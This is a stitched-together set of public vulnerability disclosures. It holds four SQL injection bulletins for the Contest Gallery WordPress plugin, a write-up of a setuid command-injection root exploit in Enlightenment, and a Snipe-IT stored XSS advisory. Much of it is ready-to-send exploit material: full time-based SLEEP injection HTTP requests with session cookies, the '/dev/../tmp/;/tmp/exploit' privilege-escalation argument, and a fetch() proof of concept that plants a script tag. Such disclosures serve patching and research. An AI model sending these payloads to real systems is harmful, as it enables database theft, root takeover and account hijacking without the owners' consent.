The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the cg_Fields POST parameter before concatenating it to an SQL query in users-registry-check-registering-and-login.php. This may allow malicious visitors to leak sensitive information from the site's database.

**contest-gallery 19.1.4.1 (15/15) WordPress plug-in SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.4.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4158

CVSS 3.x Base Score

x

CVSS 2.0 Base Score

x

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

k\_sharma19@informatik.uni-kl.de

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4158

**Vulnerability Description**

The MULTIPART  cg_Fields POST query parameter in contest-gallery 19.1.4.1 is vulnerable to SQL Injection. An attacker with no privileges can abuse the _User Registration_ functionality in users-registry-check-registering-and-login.php. This leads to a threat actor crafting a malicious POST request.

**Exploitation Guide**

_**Note: In some cases, the line number mentioned in description text, above the image can be different from the image shown below it. This change is due to lines of code wrapping, which is done to represent long lines of code in the image. The description text represents the actual line number in the application.**_

Create a _New Gallery_, if no gallery was created before.

Change the _Gallery name_.

Add the shortcode cg_users_reg id="1". _**Note: id should be the id of any active the gallery.**_

_Registration form_ is visible to anyone vising the page.

Fill the form with _sample data_, and click Register.

Clicking Register triggers the vulnerable request.

The request needs to be modified by modifying the values of MULTIPART POST parameter cg_Fields[1][Form_Input_ID] and cg_Fields[1][Field_Type].

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of cg_Fields at line 33 in ./v10/v10-admin/users/frontend/registry/users-registry-check-registering-and-login.php.

Subsequently, value of parameter cg_Fields[1][Form_Input_ID] is assigned to $Form_Input_ID. 

At line 183 in ./v10/v10-admin/users/frontend/registry/users-registry-check-registering-and-login.php database query call on $Form_Input_ID leads to SQL Injection.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin-ajax.php HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------22204028416237992052154109961
    Content-Length: 3796
    Origin: http://localhost:8080
    Connection: close
    Referer: http://localhost:8080/?p=1
    Cookie: wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_current_page_id"
    
    1
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_check"
    
    63e2eac15c3548881b7e582f807cb491fc9b8c0cb7a61631580a8db22fa29d70
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="action"
    
    post_cg_registry
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_gallery_id_registry"
    
    1
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[1][Form_Input_ID]"
    
    1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[1][Field_Type]"
    
    user-check-agreement-field					
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[1][Field_Order]"
    
    1
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[1][Field_Content]"
    
    testing
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[2][Form_Input_ID]"
    
    2
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[2][Field_Type]"
    
    main-nick-name
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[2][Field_Order]"
    
    1
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[2][Field_Content]"
    
    testing
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[3][Form_Input_ID]"
    
    3
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[3][Field_Type]"
    
    main-mail
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[3][Field_Order]"
    
    2
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[3][Field_Content]"
    
    ds@g.com
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[4][Form_Input_ID]"
    
    4
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[4][Field_Type]"
    
    password
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[4][Field_Order]"
    
    3
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[4][Field_Content]"
    
    testing
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[5][Form_Input_ID]"
    
    5
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[5][Field_Type]"
    
    password-confirm
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[5][Field_Order]"
    
    4
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg_Fields[5][Field_Content]"
    
    testing
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg-main-mail"
    
    ds@g.com
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg-main-user-name"
    
    testing
    -----------------------------22204028416237992052154109961
    Content-Disposition: form-data; name="cg-main-nick-name"
    
    testing
    -----------------------------22204028416237992052154109961--

CVE-2022-4158: Security Bulletin

The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the option_id GET parameter before concatenating it to an SQL query in export-images-data.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.

**contest-gallery 19.1.4.1 (2/15) WordPress plug-in SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.4.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4151

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

k\_sharma19@informatik.uni-kl.de

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4151

**Vulnerability Description**

The option_id GET query parameter in contest-gallery 19.1.4.1 is vulnerable to SQL Injection. An authenticated attacker may abuse the _Export all fields and total rating_ functionality in cg_images_data_csv_export function inside export-images-data.php. This leads to a threat actor crafting a malicious GET request.

**Exploitation Guide**

Login as admin user. This attack requires at least admin privileges.

Create a _New Gallery_, if no gallery was created before.

Change the _Gallery name_.

Click on Edit gallery.

Click Export all fields and total rating

Clicking Export all fields and total rating triggers the vulnerable request, the option_id GET parameter is the vulnerable query parameter.

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of user_id at line 21 in ./v10/v10-admin/export/export-images-data.php.

At lines 38-43 in ./v10/v10-admin/export/export-images-data.php the database query call on $GalleryID leads to SQL Injection.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin.php?page=contest-gallery/index.php&option_id=8+AND+(SELECT+7394+FROM+(SELECT(SLEEP(3*2)))UrUZ)&edit_gallery=true HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 41
    Origin: http://localhost:8080
    Connection: close
    Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668473199%7CmFhoaVtvxA8yev5wAqpggBLhRsiY0PfpEBma5kPRq8T%7Cb131f9f1d3b9498930de4f620580d0214b838d43b71fdedf92328ca0032bbcdb; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668473199%7CmFhoaVtvxA8yev5wAqpggBLhRsiY0PfpEBma5kPRq8T%7Cf386bbd185ec8df8d8f91a0b8e8c5431b81e06b292212515a24d8c73b7d47d52; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668300399
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    contest_gal1ery_post_create_data_csv=true

CVE-2022-4151: Security Bulletin

The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the upload[] POST parameter before concatenating it to an SQL query in get-data-create-upload-v10.php. This may allow malicious users with at least author privilege to leak sensitive information from the site's database.

/

contest-gallery 19.1.5 (7/15) WordPress plug-in SQL injection

**contest-gallery 19.1.5 (7/15) WordPress plug-in SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.5

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4153

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

k\_sharma19@informatik.uni-kl.de

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4153

**Vulnerability Description**

The upload[] MULTIPART POST query parameter in contest-gallery 19.1.5 is vulnerable to SQL Injection. An attacker with role of Author or above may abuse the _Save form_ functionality in get-data-create-upload-v10.php. This leads to a threat actor crafting multiple malicious POST requests.

**Exploitation Guide**

Create a _New Gallery_, if no gallery was created before.

Change the _Gallery name_.

Click on Edit gallery.

Click Edit upload form.

Click on Save form.

Clicking Save form triggers the vulnerable request.

The request needs to be modified by replacing MULTIPART POST parameter upload[1][type] value from bh to url . Here upload[] is the vulnerable query parameter.

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of upload[] at line 251 in ./v10/v10-admin/upload/get-data-create-upload-v10.php.

At line 596 in ./v10/v10-admin/upload/get-data-create-upload-v10.php the database query call on $id leads to SQL Injection.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&option_id=1&define_upload=true HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------2697798261719864473183552564
    Content-Length: 1215
    Origin: http://localhost:8080
    Connection: close
    Cookie: wordpress_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7Ce93774011f8915e8d1b69955e8c50a905c9040c9c17efcca7b42f24fb32f43e2; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=pegasus%7C1668532775%7Ce9naGH0Y1x4WXb9vxCjC8JDEhkEcfRIJuC2uoLiJUrE%7C2bc19f40221c8d9c3d9219517701a229fe9080215045fe6a050c6d9b594282b3; wp-settings-time-5=1668359977
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="_wpnonce"
    
    07bde4fc61
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="_wp_http_referer"
    
    /wp-admin/admin-ajax.php?page=contest-gallery%2Findex.php&option_id=1&define_upload=true
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="option_id"
    
    1
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="upload[1/**/AND/**/(SELECT/**/7741/**/FROM/**/(SELECT(SLEEP(5)))hlAf)][type]"
    
    url
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="upload[1][order]"
    
    4
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="actualID[]"
    
    1
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="action"
    
    post_contest_gallery_action_ajax
    -----------------------------2697798261719864473183552564
    Content-Disposition: form-data; name="cgBackendHash"
    
    e12e8782da8ac6c4f1725d81a9811524
    -----------------------------2697798261719864473183552564--

CVE-2022-4153: Security Bulletin

The Contest Gallery WordPress plugin before 19.1.5.1, Contest Gallery Pro WordPress plugin before 19.1.5.1 do not escape the wp_user_id GET parameter before concatenating it to an SQL query in management-show-user.php. This may allow malicious users with administrator privileges (i.e. on multisite WordPress configurations) to leak sensitive information from the site's database.

**contest-gallery 19.1.4.1 (6/15) WordPress plug-in SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 05 2022

Affected Software

contest-gallery

Affected Software Type

WordPress plugin

Version

19.1.4.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4155

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Kunal Sharma, Daniel Krohmer

Reporter Contact

k\_sharma19@informatik.uni-kl.de

Link to Affected Software

https://wordpress.org/plugins/contest-gallery/

Link to Vulnerability DB

https://nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-4155

**Vulnerability Description**

The wp_user_id GET query parameter in contest-gallery 19.1.4.1 is vulnerable multiple to SQL Injection. An authenticated attacker may abuse the _Users Management_ functionality in management-show-user.php. This leads to a threat actor crafting multiple malicious GET requests.

**Exploitation Guide**

Login as admin user. This attack requires at least admin privileges.

Create a _New Gallery_, if no gallery was created before.

Change the _Gallery name_.

Click on Edit gallery.

Click User management

Clicking User management triggers the vulnerable request.

**Exploit 1**

The request needs to be modified by adding GET parameter edit_registration, wp_user_id, and MULTIPART POST parameter cg_input_image_upload_file_to_delete_wp_id. Here wp_user_id is the vulnerable query parameter.

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of wp_user_id at line 18 in ./v10/v10-admin/users/admin/users/management-show-user.php.

At line 25 in ./v10/v10-admin/users/admin/users/management-show-user.php the database query call on $wpUserId leads to SQL Injection.

**Exploit 2**

The request needs to be modified by adding GET parameter edit_registration, wp_user_id, and wp_user_meta_entries. Here wp_user_id is the vulnerable query parameter.

A POC may look like the following request:

In the application code, the vulnerability is triggered by un-sanitized user input of wp_user_id at line 18 in ./v10/v10-admin/users/admin/users/management-show-user.php.

At line 46 in ./v10/v10-admin/users/admin/users/management-show-user.php the database query call on $wpUserId leads to SQL Injection.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

**Exploit 1:**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&users_management=true&option_id=1&edit_registration_entries=1&wp_user_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ) HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------15540990533670320912247141513
    Content-Length: 506
    Origin: http://localhost:8080
    Connection: close
    Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7Cd5b9cbd98cd7c7823a4eaafd9a2835604947bf858ba78d5e5dd7d78483c5ca16; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7C9aed4838ce07f42546cfa615b8a441061ea6a48fe19875091cb73070dad3d826; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668343335
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------15540990533670320912247141513
    Content-Disposition: form-data; name="action"
    
    post_contest_gallery_action_ajax
    -----------------------------15540990533670320912247141513
    Content-Disposition: form-data; name="cgBackendHash"
    
    e12e8782da8ac6c4f1725d81a9811524
    -----------------------------15540990533670320912247141513
    Content-Disposition: form-data; name="cg_input_image_upload_file_to_delete_wp_id"
    
    Test
    -----------------------------15540990533670320912247141513--
    
    

**Exploit 2:**

The SQL injection can be triggered by sending the request below:

    POST /wp-admin/admin-ajax.php?page=contest-gallery/index.php&users_management=true&option_id=1&edit_registration_entries=1&wp_user_id=1+AND+(SELECT+7394+FROM+(SELECT(SLEEP(5)))UrUZ)&wp_user_meta_entries=1 HTTP/1.1
    Host: localhost:8080
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:8080/wp-admin/admin.php?page=contest-gallery%2Findex.php
    X-Requested-With: XMLHttpRequest
    Content-Type: multipart/form-data; boundary=---------------------------15540990533670320912247141513
    Content-Length: 355
    Origin: http://localhost:8080
    Connection: close
    Cookie: wordpress_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7Cd5b9cbd98cd7c7823a4eaafd9a2835604947bf858ba78d5e5dd7d78483c5ca16; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=kaiba%7C1668516135%7CWgUk406d19ZwWCF4WBgPmofD7nFyZVLsVEXF13g2BYq%7C9aed4838ce07f42546cfa615b8a441061ea6a48fe19875091cb73070dad3d826; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse; wp-settings-time-1=1668343335
    Sec-Fetch-Dest: empty
    Sec-Fetch-Mode: cors
    Sec-Fetch-Site: same-origin
    
    -----------------------------15540990533670320912247141513
    Content-Disposition: form-data; name="action"
    
    post_contest_gallery_action_ajax
    -----------------------------15540990533670320912247141513
    Content-Disposition: form-data; name="cgBackendHash"
    
    e12e8782da8ac6c4f1725d81a9811524
    -----------------------------15540990533670320912247141513--

CVE-2022-4155: Security Bulletin

enlightenment_sys in Enlightenment before 0.25.4 allows local users to gain privileges because it is setuid root, and the system library function mishandles pathnames that begin with a /dev/.. substring.

**CVE-2022-37706**

Hello guys, this time I'm gonna talk about a recent 0-day I found in one of the  
main window managers of Linux called Enlightenment (https://www.enlightenment.org/).  
This 0-day gonna take any user to root privileges very easily and instantly.  
The exploit is tested on Ubuntu 22.04, but should work just fine on any distro.  

First of all Enlightenment is a Window Manager, Compositor and Minimal Desktop  
for Linux (the primary platform), BSD and any other compatible UNIX system.  

I installed this window manager to experiment a bit with it. It was interesting  
for me as it contain a lot of tools and it looks pretty neat to be honest.  

After I installed the package using apt install enlightenment I examined the  
installed files and directory on my system, a lot of modules and a lot of helper  
binaries, but what is most interesting is :  

    ➜  enlightenment cd /usr/lib/x86_64-linux-gnu/enlightenment/
    ➜  enlightenment find . -perm -4000                         
    ./utils/enlightenment_ckpasswd
    ./utils/enlightenment_system
    ./utils/enlightenment_sys
    

It installs some SUID binaries, then I was thinking if I can use one of those  
to escalate to root, the binaries were all secure looking and well coded.  
The binary we will be talking about is enlightenment\_sys.  

As any other target we choose a strategy to apply after doing some pre-assessment  
see my blog here if not yet (https://pwn-maher.blogspot.com/2020/10/vulnerability-assessment.html)  

I audited the code on a Top-Down approach.  
And because this window manager is open source, the source code will be available  
for all those binaries and modules.  
So first thing I did was apt source enlightenment to get all the source code,  
and with a bit of digging we can get to the target binary code.  

But to debug the binary I load it to Ghidra for analysis and to have addresses  
to set breakpoints and all.  
No symbols were found first try but yeah no need for those as it turned out to  
be a relatively small binary.  
Surprisingly, I found it very pleasing to look at the decompiled pseudo-code of  
Ghidra than looking directly at the src (avoid macros, avoid also those checks  
against the OS being used to compile a specific block of code).  

So let's start analysis.  

1- Play with the binary.  
Let's run the file to see some information about our target:  
  

Running the binary do not give any output:  
  

Giving --help argument gave this output:  
  
Sorry, I will use it to get root.  

Next let's just strace and see if it will use any suspicious syscalls like  
execve or openat:  
strace ./enlightenment\_sys 2>&1 | grep open  
  
It just opens known libraries at places we don't have permission to tamper with.  

strace ./enlightenment\_sys 2>&1 | grep exec  
  

2- Let's reverse engineer the binary and then exploit it.  

I created a new Ghidra project, and I loaded this specific binary.  
Because symbols were not found, we can spot the main function using entry.  
The first argument to entry function is main itself.  
I renamed it to main for future references.  
Scrolling a bit down I can already spot system() function being used.  

As a pwner I spend days on challenges to spawn this specific function x)  
I reversed the binary looking for a memory corruption bug or some heap problems  
, but actually it was a weird Command Injection.  
The binary take all security precautions before running system, but sadly we  
can always inject our input in there.  
  

Ok, now let's walk the binary from top up to our system function, trying to  
inject our input in there.  

First the binary just checks if the first arg is --help or -h and shows that  
message we saw earlier.  
  

Second it elevate it's privileges to root.  
  

Next it unset almost all environment variables (security precautions) to not  
invoke another non-intended binary.  
  

So if the first arg we entered is "mount" it will enter this branch, check some  
flags given, those flags gonna be set on the stack.  

Next it checks if the next param after mount is UUID= we don't want to enter  
here, so we gave "/dev/../tmp/;/tmp/exploit".  
  
Like this we pass the check at line 410. the strncmp check.  
Because if it don't start with /dev/ the binary will exit.  
Next there is a call to stat64 on that file we provided, note that we can  
create a folder called ";" and that will be causing the command injection.  
Until now, the exploit already created this file /dev/../tmp/;/tmp/exploit,  
but this is not the exploit that will be called.  
  
  

We're getting closer to system() now.  
Now p (pointer), gets updated to the last argument given to our SUID binary,  
/tmp///net.  

Why providing /tmp///net when we can pass /tmp/net?  
We will bypass this check:  
if (((next_next == (char *)0x0) || (next_next[1] == '\0')) || ((long)next_next - (long)p != 6))  
We needed /tmp/net to exist and /tmp/// to be on length 6.  

Now the last stat64 will check for the existence of "/dev/net"  
\_\_snprintf\_chk(cmd,0x1000,1,0x1000,"/dev%s",next\_next);  
And it will find it, so we pass that last check.  

Now it will check for the availability for some files, but that's not important  
at this point, because we're all set and all close to trigger arbitrary Command  
Execution.  

Now eina\_strbuf\_new() will just initialize the command that will be passed to  
system, the problem here is that we entered it as:  

/bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///net  

But the binary calls eina\_strbuf\_append\_printf() for several times and becomes  
/bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), /dev/../tmp/;/tmp/exploit /tmp///net  
Notice that double quotes are removed, and we will be able to call /tmp/exploit  
as root.  
  

The binary tried it's best to mitigate any non-intended behavior but as usual  
anything can be pwned. I wasn't expecting to exploit this using a logical bug  
like this.  
I want the next CVE to be a memory corruption leading to LPE root.  

Twitter disclosure: https://twitter.com/maherazz2/status/1569665311707734023

CVE-2022-37706: GitHub - MaherAzzouzi/CVE-2022-37706-LPE-exploit: A reliable exploit + write-up to elevate privileges to root. (Tested on Ubuntu 22.04)

Snipe-IT through 6.0.14 allows attackers to check whether a user account exists because of response variations in a /password/reset request.

POSTED BY: Charalampos Maraziaris / 23.12.2022

**Multiple vulnerabilities in Snipe-IT**

CENSUS ID:

CENSUS-2022-0002

CVE IDs:

CVE-2022-44380, CVE-2022-44381

Affected Products:

Snipe-IT versions prior to 6.0.14

Class of CVE-2022-44380:

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE-79)

Class of CVE-2022-44381:

Improper Access Control (CWE-284)

Discovered by:

Charalampos Maraziaris

CENSUS identified Cross-Site Scripting (XSS) and username fingerprinting bugs in Snipe-IT. Snipe-IT is a free open source IT asset/license management system. CENSUS has verified that release 6.0.14 of Snipe-IT carries appropriate fixes only for the identified Cross Site Scripting vulnerabilities.

**CVE-2022-44380 Vulnerability Details**

A stored XSS vulnerability exists in the **"Account"** drop-down menu on the top-right of the app's UI (present in every page), when the user selects the **"View Assigned Assets"** options from the menu. A Stored XSS attack allows for adversaries to place malicious Javascript code into the database and have this Javascript code executed in a visitor's browser.

The loaded view (account/view-assets) renders Assets, Licences, Accessories and Consumables drawn from the database. The code responsible for presenting the database entries in the "account/view-assets" view (/resources/views/account/view-assets.blade.php) is presented below (release 6.0.12):

For Accessories: /resources/views/account/view-assets.blade.php

    
        550: <td>{!! $accessory->name !!}</td>
    

For Consumables: /resources/views/account/view-assets.blade.php

    
        598: <td>{!! $consumable->name !!}</td>
    

As shown above, the title is drawn from the database without using the double curly braces ({{ ... }}) that provide for HTML entity escaping in the Laravel Blade framework. Instead, ({!! ... !!}) is used that does not escape content. Therefore it is possible for an attacker to inject malicious Javascript in the Accessory and Consumable name field, and have this executed on a visitor's browser.

The stored XSS attack can be performed by an adversary that has **Accessory.CREATE** permissions (to insert an Accessory title in the database) and **Accessory.CHECKOUT** permissions (to assign this Accessory to any user). The same attack targeting Consumables can be performed by an adversary possessing **Consumable.CREATE** and **Consumable.CHECKOUT** permissions. Any user can be the victim of this attack as the malicious asset could be _assigned_ to that user. By targeting a Super User, an authenticated adversary can achieve privilege escalation, granting himself the Super User status.

As a proof of concept, the following payload creates a malicious **Accessory** entry:

    
    await fetch("http://SNIPE-IT-DOMAIN/accessories", {
        "credentials": "include",
        "headers": {
            "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "en-US,en;q=0.5",
            "Content-Type": "multipart/form-data; boundary=---------------------------423391379527772494482286626525",
            "Upgrade-Insecure-Requests": "1",
            "Sec-Fetch-Dest": "document",
            "Sec-Fetch-Mode": "navigate",
            "Sec-Fetch-Site": "same-origin",
            "Sec-Fetch-User": "?1",
            "Pragma": "no-cache",
            "Cache-Control": "no-cache"
        },
        "referrer": "http://SNIPE-IT-DOMAIN/accessories/create",
        "body": "
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"_token\"\r\n\r\VALID_CSRF_TOKEN\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"company_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"name\"\r\n\r\nabc <script> alert(1); </script>\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"category_id\"\r\n\r\nVALID_CATEGORY_ID\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"supplier_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"manufacturer_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"location_id\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"model_number\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"order_number\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"purchase_date\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"purchase_cost\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"qty\"\r\n\r\n9999\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"min_amt\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"notes\"\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"image\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525\r\n
        Content-Disposition: form-data; 
        name=\"image\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n
        -----------------------------423391379527772494482286626525--\r\n",
        "method": "POST",
        "mode": "cors"
    });
    

